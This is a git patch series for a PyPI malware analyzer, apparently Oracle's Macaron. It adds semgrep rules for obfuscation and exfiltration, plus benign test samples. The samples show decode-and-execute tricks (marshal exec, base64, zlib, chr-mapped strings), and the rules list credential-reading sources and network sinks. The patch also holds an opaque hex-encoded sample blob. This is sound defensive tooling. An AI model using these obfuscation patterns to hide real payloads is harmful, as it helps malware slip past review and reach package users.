b48ef9e59b52644fcde101088a409b42376e4f99454444de8557ff1992b415501a7db525a6811e37245d2a27060dfaf1387bc8afd0b654864735c75586af6def5681cd24053188291c672cff4bfd31be5275ae3fdc3d2cbad6e14e054f723922c9b0974e53704b8b1cd080b8ee55657eb9bce3234efe0a6001078ef5db0932cb7ba43c6956967686fb175a8e24619981440a9b5e553668ee004bc6e39506125f6f3e3a0bbdd1997af1dcee9d49a4b093be471296135de8e05c852c2e2e0b0682a4897e5141016648848323a30ca19c60369a758d9c3f3330e944d6c
5eb4b46cc700a8b814499bdaa597df95a6288bad41690a820d37cb2256b53561beaccea1ced827f0b5a5056325f6fd35a9b67ae3b4aeae5d18edc0c30002a1f524f9be194d51de79fdd88ffb91df7014bf33f1206d52e0bc091d66dca8703f9018ed0a6c6c62e3d01a557db33e87f1eac3e60574403e197c39839942cf49c98805c77206a3148a64de60c4c18ea627dc62132f6308aaea109c5fd3610d6aac73332d0213e194bec46c81f60783e3c61d6ee9725989f52e0cdadaf3a3edf333bf729708e21b0202e134ed3a57518088139635c427aa8914b5a8360125915cca4912496c50e530b3200aaa9c4f2132d6d13c595cc7081f10f9f273c51baf41ac410bae5040215948c6d7d58a5e93073fb589b903ddc019fb047eb7d4beacc4be9e0ce3d494c0a9cf93675452d306ba1120109d4b294dcfb0d1ba6486a1255301cc6c495b56b129905c4a4802835c02c518027911266cb1ab899853e8a09f2a65034c41038a4bf9ae8a11b9bd4817ba8d32ca1ab4e00a05149285a02f3380f4458f364ab0f9726362639fc0e196ba9d95d8bb030dfb7dcc8c8a6a1584c03827201049d3aeb199a914090dc01ae2d356829202ceb5b4fccafcb27c96a1148a64de6004dc4a347b278c40b80309b6b6cba8bf8628aaea109c5fc5610d6aac7363f50105e4d426e60e740330466edcef964a979538c493434a5de39955d50b7b7a8ffe1680401c4dbece35ed02da19331c44c2c53df98296d4945ff9280c6f563b4b11040d5a7085020ac94234d71180a508e251cfcfef962288957802455039b33ac85934a1fae55395458431fd0e6bc55512311f665d4995c987fc0c3b67b9796d18944b61c632ac77789c3f0a0231111a0fd07a30e804bb9f85d05a0572cae150ca497360afeb20a07a0614976f195a3712da456a2f654ccfb1d6b406256101030ac94234d40940faca501b25d87cb931b1b14fe0704b73c34a1cf02d030813b637c9bf142eddc68667d3e6550240357e4f7120303f1a53f7946c986788afa79befc329dd610c77e4318705c7d37edbd23c293f774fdd975fd65776697da55e5034aff70eb05ebc19edff0cd1139aa01aa0516615bc081c554ddda4fd178eaff5cbe63846011d763eec47f4a9012a582957d589cbd20c4d04e9758662a4c95ea0d325d70e12ffa9d3e5a7b33a8fcab2c448fbd56d1b62a8d311549a94c46ddb8a098a5b11de4eb8e93ca6f9f3ad22f194d5c0a29dd6b2d80b5a61e966d870688ef10ca7131311d4007e741a8e9f5802ad32a7a32c3b3869e1382686cb077349c418566a11cec979d5e65b76f1fa5576795b3d1f5f760fabdddffb5356bfe679f6ef7cb5ffb17a3b9e56cfdbc361fbfdb0cb7eee4edbd3e9bd6aeebfffde1f4efbb78fcabb5777cfc7d7
5ffbc3eeee7ef5e7f1ad5aba3abeafa0a9c56562b5a42c5f8f2fbf0fbbb2ac56dddde5ab7f3daeeeda997722046fdbd7e1f2968dd5eef0b1bbb092d50130088d6fad22eabf19efe0434ea834f994b5f02f5fdab7afdd927cf3d58b408db81df644919c4780d74d6ece0cd7ed43c777fb12c0abc9a7164b5695c9feab5d3e1883346aecb33a90e16393fc647e9aff1f99b5fed2'.replace("\n" , ""))).decode()) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..2e30b1e33 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -0,0 +1,54 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" +import json +import os +from unittest.mock import MagicMock + +import pytest + +import macaron +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer + + +@pytest.mark.skip(reason="experimental feature") +def test_no_resources() -> None: + """Test for when the semgrep rules can't be found, so error.""" + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path="") + + +@pytest.mark.skip(reason="experimental feature") +def test_no_sourcecode(pypi_package_json: MagicMock) -> None: + """Test for when there is no source code available, so error.""" + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + pypi_package_json.package_sourcecode_path = "" + + with pytest.raises(HeuristicAnalyzerValueError): + analyzer.analyze(pypi_package_json) + + +@pytest.mark.skip(reason="experimental feature") 
+def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: + """Test the semgrep rules for obfuscation on code samples.""" + sample_path = os.path.join( + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", "obfuscation" + ) + + with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: + expected_results = json.loads(file.read()) + __import__("pprint").pprint(expected_results) + + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + pypi_package_json.package_sourcecode_path = sample_path + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, "obfuscation.yaml") + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + assert expected_results == analysis From 2f7e2021e590f60f62afb61c90433aecb3bf42c3 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 4 Feb 2025 11:13:39 +1000 Subject: [PATCH 07/37] test: finished sample test files for obfuscation rules --- .../pypi_malware_rules/obfuscation.yaml | 9 +- .../obfuscation/decode_and_execute.py | 47 ++++- .../obfuscation/expected_results.json | 193 +++++++++++------- .../pypi/test_pypi_sourcecode_analyzer.py | 6 +- 4 files changed, 173 insertions(+), 82 deletions(-) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 76b327578..f6ef8386d 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -114,24 +114,29 @@ rules: - pattern: __import__('marshal').loads(...) # bytes decoding - pattern: | - "...".decode(...) + b'...'.decode(...) - pattern: $BYTES.decode(...) - pattern: bytes.decode(...) + - pattern: builtins.bytes.decode(...) + - pattern: __import__('builtins').bytes.decode(...) - pattern: $BYTES.join(...).decode() # decompression - pattern: zlib.decompress(...) 
- pattern: __import__('zlib').decompress(...) # base64 decoded string values - pattern: base64.b64decode(...) - - pattern: __import__('base64').decode(...) + - pattern: __import__('base64').b64decode(...) - pattern: b64decode(...) # hex encoded values - pattern: bytes.fromhex(...) + - pattern: builtins.bytes.fromhex(...) + - pattern: __import__('builtins').bytes.fromhex(...) # unicode construction - patterns: - pattern-either: - pattern: $STRING.join(map($FOO, [...])) - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $ITER) - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) - metavariable-regex: metavariable: $FOO diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py index 74ce85c19..114072a52 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -19,8 +19,49 @@ def test_function(): samples. """ sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. 
+ # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + def marshal_flow(): + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) + + def marshal_inline_flow(): + exec(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00')) + + def bytes_eval_to_soc_bind(): + import socket + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc: + soc.bind(__import__('builtins').eval(b'("127.0.0.1", 0)'.decode())) + + def map_b64_to_request(): + import requests as req + + # decodes to GET + method = __import__('base64').b64decode(b'R0VU') + # just maps to a random fake link https://www.print-hello-world-sample.com/print/hello/world! 
+ link = ''.join(map(chr, [104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 112, 114, 105, 110, 116, 45, 104, 101, 108, 108, 111, 45, 119, 111, 114, 108, 100, 45, 115, 97, 109, 112, 108, 101, 46, 99, 111, 109, 47, 112, 114, 105, 110, 116, 47, 104, 101, 108, 108, 111, 47, 119, 111, 114, 108, 100, 33])) + _ = req.Request(method, link) + + def zlib_ast_subprocess(): + import subprocess + import zlib as zeeee + from ast import literal_eval + + # just decodes to ["echo", "Hello world!"] + subprocess.Popen(literal_eval(zeeee.decompress(b'x\x9c\x8bVOM\xce\xc8W\xd7QP\xf7H\xcd\xc9\xc9W(\xcf/\xcaIQT\x8f\x05\x00]\xa0\x07\x9d').decode())) + + def propagation_to_write(): + import os as e - from marshal import loads - bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') - exec(bytecode) + # symbol propagations should detect assign of os as e to o and bytes to b and still trigger + o = e + b = bytes + # just decodes to "Hello world!" 
+ contents = b.fromhex("48656C6C6F20776F726C6421") + # just decodes to "some_path" + file = o.open(''.join(chr(c) for c in [115, 111, 109, 101, 95, 112, 97, 116, 104]), o.O_RDWR) + o.pwritev(file, contents, 0) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 3376aa3ed..b369538bf 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -2,11 +2,128 @@ "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 26, - "end": 26 + "start": 30, + "end": 30 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 46, + "end": 46 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 64, + "end": 64 + } + ], + "src.macaron.resources.pypi_malware_rules.inline-imports": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + 
"file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 43, + "end": 43 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 49, + "end": 49 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 50, + "end": 50 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 52, + "end": 52 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 56, + "end": 56 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 57, + "end": 57 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 58, + 
"end": 58 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 59, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 60, + "end": 60 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 69, + "end": 69 } ], "src.macaron.resources.pypi_malware_rules.default-assigning": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 59, + "end": 59 + }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", "start": 23, @@ -208,78 +325,6 @@ "end": 68 } ], - "src.macaron.resources.pypi_malware_rules.inline-imports": [ - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 49, - "end": 49 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 50, - "end": 50 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 51, - "end": 51 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 52, - "end": 52 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 53, - "end": 53 - }, - { - 
"file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 54, - "end": 54 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 55, - "end": 55 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 56, - "end": 56 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 57, - "end": 57 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 58, - "end": 58 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 59, - "end": 59 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 60, - "end": 60 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 61, - "end": 61 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", - "start": 69, - "end": 69 - } - ], "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 2e30b1e33..a26b354cc 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -14,14 
+14,14 @@ from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer -@pytest.mark.skip(reason="experimental feature") +# @pytest.mark.skip(reason="experimental feature") def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so error.""" with pytest.raises(ConfigurationError): _ = PyPISourcecodeAnalyzer(resources_path="") -@pytest.mark.skip(reason="experimental feature") +# @pytest.mark.skip(reason="experimental feature") def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) @@ -32,7 +32,7 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: analyzer.analyze(pypi_package_json) -@pytest.mark.skip(reason="experimental feature") +# @pytest.mark.skip(reason="experimental feature") def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( From 92c7c2dcc62be47d3bbc444e1c96a1d5ef1b1ade Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 4 Feb 2025 11:26:40 +1000 Subject: [PATCH 08/37] fix: obfuscation tests were incorrect --- .../obfuscation/expected_results.json | 20 +++++++++---------- .../pypi/test_pypi_sourcecode_analyzer.py | 6 +++--- 2 files changed, 13 insertions(+), 13 deletions(-) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index b369538bf..03bf0858b 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -17,18 +17,18 @@ }, { "file": 
"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 46, - "end": 46 + "start": 47, + "end": 47 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 53, - "end": 53 + "start": 55, + "end": 55 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 64, - "end": 64 + "start": 67, + "end": 67 } ], "src.macaron.resources.pypi_malware_rules.inline-imports": [ @@ -44,8 +44,8 @@ }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 43, - "end": 43 + "start": 44, + "end": 44 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", @@ -121,8 +121,8 @@ "src.macaron.resources.pypi_malware_rules.default-assigning": [ { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 59, - "end": 59 + "start": 62, + "end": 62 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index a26b354cc..2e30b1e33 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -14,14 +14,14 @@ from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer -# @pytest.mark.skip(reason="experimental feature") +@pytest.mark.skip(reason="experimental feature") def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so 
error.""" with pytest.raises(ConfigurationError): _ = PyPISourcecodeAnalyzer(resources_path="") -# @pytest.mark.skip(reason="experimental feature") +@pytest.mark.skip(reason="experimental feature") def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) @@ -32,7 +32,7 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: analyzer.analyze(pypi_package_json) -# @pytest.mark.skip(reason="experimental feature") +@pytest.mark.skip(reason="experimental feature") def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( From e4058949aa98144af6c11db960f56b303c28ef9c Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 4 Feb 2025 16:47:55 +1000 Subject: [PATCH 09/37] test: tests for exfiltration and fixes to semgrep rules --- .pre-commit-config.yaml | 4 + pyproject.toml | 5 - .../pypi_malware_rules/exfiltration.yaml | 92 ++++++++++++------- .../pypi_malware_rules/obfuscation.yaml | 64 ++++++++++--- .../exfiltration/expected_results.json | 19 ++++ .../exfiltration/remote-exfiltration.py | 50 ++++++++++ .../pypi/test_pypi_sourcecode_analyzer.py | 15 ++- 7 files changed, 195 insertions(+), 54 deletions(-) create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 94f2d2625..16c2ff3fa 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -30,6 +30,7 @@ repos: - id: isort name: Sort import statements args: [--settings-path, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Add Black code formatters. 
- repo: https://github.com/ambv/black @@ -38,6 +39,7 @@ repos: - id: black name: Format code args: [--config, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* - repo: https://github.com/asottile/blacken-docs rev: 1.19.1 hooks: @@ -83,6 +85,7 @@ repos: entry: pylint language: python files: ^src/macaron/|^tests/ + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* types: [text, python] args: [--rcfile, pyproject.toml] @@ -108,6 +111,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: ['bandit[toml]'] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Enable a whole bunch of useful helper hooks, too. # See https://pre-commit.com/hooks.html for more hooks. diff --git a/pyproject.toml b/pyproject.toml index 86f57c285..aa93bd1a4 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -123,14 +123,10 @@ Issues = "https://github.com/oracle/macaron/issues" [tool.bandit] tests = [] skips = ["B101"] -exclude_dirs = ['tests/malware_analyzer/pypi/resources/sourcecode_samples'] # https://github.com/psf/black#configuration [tool.black] line-length = 120 -force-exclude = ''' -tests/malware_analyzer/pypi/resources/sourcecode_samples/ -''' # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ @@ -243,7 +239,6 @@ disable = [ "too-many-statements", "duplicate-code", ] -ignore-paths = "tests/malware_analyzer/pypi/resources/sourcecode_samples" [tool.pylint.MISCELLANEOUS] notes = [ diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index fa96f43d3..146d04315 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -11,6 +11,8 @@ rules: severity: ERROR mode: taint options: + # this will help us detect the flow of objects for exfiltration, like + # "with 
requests.Session() as s: s.get(...)" symbolic_propagation: true pattern-sources: - pattern-either: @@ -53,6 +55,7 @@ rules: - pattern: os.spawnvp(...) - pattern: os.spawnvpe(...) - pattern: os.system(...) + - pattern: os.popen(...) # using commands module - pattern: commands.getstatusoutput(...) - pattern: commands.getoutput(...) @@ -114,32 +117,18 @@ rules: - pattern: keyring.get_keyring(...) - pattern: keyring.get_password(...) - pattern: keyring.get_credential(...) - - pattern: winreg.ConnectRegistry(...) - - pattern: winreg.LoadKey(...) - - pattern: winreg.OpenKey(...) - - pattern: winreg.OpenKeyEx(...) - - pattern: winreg.QueryInfoKey(...) - - pattern: winreg.QueryValue(...) - - pattern: winreg.QueryValueEx(...) - - pattern: sqlite3.connect(...) # file exfiltration - - patterns: - - pattern: open($FILE, $MODE) - - metavariable-regex: - metavariable: $MODE - regex: r|rt|r+|w+|rb|r+b|w+b|a+|a+b - - patterns: - - pattern: os.open($FILE, $MODE) - - metavariable-regex: - metavariable: $MODE - regex: os\.O_RDONLY|os\.O_RDWR + - pattern: os.read(...) + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) + - pattern: yaml.safe_load(...) + - pattern: json.loads(...) pattern-sinks: - pattern-either: # remote connection # using socket module - - pattern: socket.socket(...) - pattern: $SOC.accept(...) - pattern: $SOC.bind(...) - pattern: $SOC.connect(...) @@ -164,23 +153,41 @@ rules: - pattern: requests.delete(...) - pattern: requests.head(...) - pattern: requests.options(...) - - pattern: requests.Session(...) + - pattern: requests.patch(...) + # object creation like requests.Session(...) here is omitted as exfiltrated data likely won't + # be passed into the parameters of those objects + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) 
+ - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) - pattern: requests.Request(...) # using urllib3 module - - pattern: urllib3.PoolManager(...) - pattern: urllib3.request(...) - - pattern: urllib3.HTTPConnectionPool(...) - - pattern: urllib3.HTTPSConnectionPool(...) - - pattern: urllib3.ConnectionPool(...) - - pattern: urllib3.ProxyManager(...) - - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) # using urllib - pattern: urllib.request(...) - pattern: urllib.request.urlopen(...) - # using urlrequest module - - pattern: UrlRequest(...) - - pattern: UrlRequestRequests(...) - - pattern: UrlRequestUrllib(...) # using httpx - pattern: httpx.request(...) - pattern: httpx.get(...) @@ -190,7 +197,24 @@ rules: - pattern: httpx.head(...) - pattern: httpx.options(...) - pattern: httpx.stream(...) - - pattern: 